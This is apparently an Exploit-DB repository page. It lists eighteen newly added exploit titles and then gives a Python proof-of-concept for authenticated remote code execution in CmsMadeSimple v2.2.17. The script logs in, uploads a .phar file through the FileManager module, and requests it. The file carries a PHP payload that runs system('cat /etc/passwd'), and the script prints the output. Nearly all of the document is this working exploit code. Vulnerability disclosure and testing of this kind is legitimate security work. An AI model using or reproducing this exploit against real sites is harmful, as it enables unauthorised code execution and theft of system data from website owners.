3a3c03321c
18 changes to exploits/shellcodes/ghdb Hikvision Hybrid SAN Ds-a71024 Firmware - Multiple Remote Code Execution ABB FlowX v4.00 - Exposure of Sensitive Information TP-Link TL-WR740N - Authenticated Directory Transversal Microsoft Edge 114.0.1823.67 (64-bit) - Information Disclosure Backdrop Cms v1.25.1 - Stored Cross-Site Scripting (XSS) Blackcat Cms v1.4 - Remote Code Execution (RCE) Blackcat Cms v1.4 - Stored XSS CmsMadeSimple v2.2.17 - Remote Code Execution (RCE) CmsMadeSimple v2.2.17 - session hijacking via Server-Side Template Injection (SSTI) CmsMadeSimple v2.2.17 - Stored Cross-Site Scripting (XSS) Joomla! com_booking component 2.4.9 - Information Leak (Account enumeration) Online Piggery Management System v1.0 - unauthenticated file upload vulnerability phpfm v1.7.9 - Authentication type juggling PimpMyLog v1.7.14 - Improper access control PMB 7.4.6 - SQL Injection Statamic 4.7.0 - File-Inclusion Vaidya-Mitra 1.0 - Multiple SQLi
63 lines
No EOL
1.4 KiB
Text
63 lines
No EOL
1.4 KiB
Text
#Exploit Title: CmsMadeSimple v2.2.17 - Remote Code Execution (RCE)
|
|
#Application: CmsMadeSimple
|
|
#Version: v2.2.17
|
|
#Bugs: Remote Code Execution(RCE)
|
|
#Technology: PHP
|
|
#Vendor URL: https://www.cmsmadesimple.org/
|
|
#Software Link: https://www.cmsmadesimple.org/downloads/cmsms
|
|
#Date of found: 12-07-2023
|
|
#Author: Mirabbas Ağalarov
|
|
#Tested on: Linux
|
|
|
|
|
|
import requests
|
|
|
|
login_url = 'http://localhost/admin/login.php'
|
|
username=input('username = ')
|
|
password=input('password = ')
|
|
|
|
|
|
upload_url = 'http://localhost/admin/moduleinterface.php'
|
|
|
|
file_path = input("please phar file name but file must same directory with python file and file content : <?php echo system('cat /etc/passwd') ?> : ")
|
|
#phar file content """"<?php echo system('cat /etc/passwd') ?>"""""
|
|
|
|
login_data = {
|
|
'username': username,
|
|
'password': password,
|
|
'loginsubmit': 'Submit'
|
|
}
|
|
|
|
|
|
session = requests.Session()
|
|
response = session.post(login_url, data=login_data)
|
|
|
|
|
|
if response.status_code == 200:
|
|
print('Login account')
|
|
else:
|
|
print('Login promlem.')
|
|
exit()
|
|
|
|
|
|
files = {
|
|
'm1_files[]': open(file_path, 'rb')
|
|
}
|
|
|
|
data = {
|
|
'mact': 'FileManager,m1_,upload,0',
|
|
'__c': session.cookies['__c'],
|
|
'disable_buffer': '1'
|
|
}
|
|
|
|
|
|
response = session.post(upload_url, files=files, data=data)
|
|
|
|
|
|
if response.status_code == 200:
|
|
print('file upload')
|
|
rce_url=f"http://localhost/uploads/{file_path}"
|
|
rce=requests.get(rce_url)
|
|
print(rce.text)
|
|
else:
|
|
print('file not upload') |